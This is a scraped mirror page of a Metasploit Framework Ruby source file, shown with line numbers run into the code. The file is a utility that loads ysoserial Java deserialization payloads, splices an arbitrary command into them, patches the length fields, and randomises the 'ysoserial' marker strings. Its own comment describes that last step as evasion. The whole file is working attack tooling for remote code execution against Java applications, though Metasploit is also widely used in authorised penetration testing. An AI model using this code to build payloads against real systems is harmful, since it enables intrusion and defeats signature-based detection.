CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/lib/msf/util/java_deserialization.rb
Views: 1904
# -*- coding: binary -*-12module Msf3module Util45require 'json'67class JavaDeserialization89PAYLOAD_FILENAME = "ysoserial_payloads.json"1011def self.ysoserial_payload(payload_name, command=nil, modified_type: 'none')12payloads_json = load_ysoserial_data(modified_type)1314# Extract the specified payload (status, lengthOffset, bufferOffset, bytes)15payload = payloads_json[payload_name]1617raise ArgumentError, "#{payload_name} payload not found in ysoserial payloads" if payload.nil?1819# Based on the status, we'll raise an exception, return a static payload, or20# generate a dynamic payload with modifications at the specified offsets21case payload['status']22when 'unsupported'23# This exception will occur most commonly with complex payloads that require more than a string24raise ArgumentError, 'ysoserial payload is unsupported'25when 'static'26# TODO: Consider removing 'static' functionality, since ysoserial doesn't currently use it27return Rex::Text.decode_base64(payload['bytes'])28when 'dynamic'29raise ArgumentError, 'missing command parameter' if command.nil?3031bytes = Rex::Text.decode_base64(payload['bytes'])3233# Insert buffer34buffer_offset = payload['bufferOffset'].first #TODO: Do we ever need to support multiple buffers?35bytes[buffer_offset - 1] += command3637# Overwrite length (multiple times, if necessary)38length_offsets = payload['lengthOffset']39length_offsets.each do |length_offset|40# Extract length as a 16-bit unsigned int, then add the length of the command string41length = bytes[(length_offset-1)..length_offset].unpack('n').first42length += command.length.ord43length = [length].pack("n")44bytes[(length_offset-1)..length_offset] = length45end4647# Replace "ysoserial\/Pwner" timestamp and "ysoserial" string with randomness for evasion48bytes.gsub!('ysoserial/Pwner00000000000000', Rex::Text.rand_text_alphanumeric(29))49bytes.gsub!('ysoserial', Rex::Text.rand_text_alphanumeric(9))5051return bytes52else53raise RuntimeError, 'Malformed JSON file'54end55end5657def self.ysoserial_payload_names(modified_type: 'none')58payloads_json = load_ysoserial_data(modified_type)59payloads_json.keys60end6162class << self63private6465def load_ysoserial_data(modified_type)66# Open the JSON file and parse it67path = File.join(Msf::Config.data_directory, PAYLOAD_FILENAME)68begin69json = JSON.parse(File.read(path, mode: 'rb'))70rescue Errno::ENOENT, JSON::ParserError71raise RuntimeError, "Unable to load JSON data from: #{path}"72end7374# Extract the specified payload type (including cmd, bash, powershell, none)75payloads_json = json[modified_type.to_s]76if payloads_json.nil?77raise ArgumentError, "#{modified_type} type not found in ysoserial payloads"78end7980payloads_json81end82end8384end # JavaDeserialization85end # Util86end # Msf878889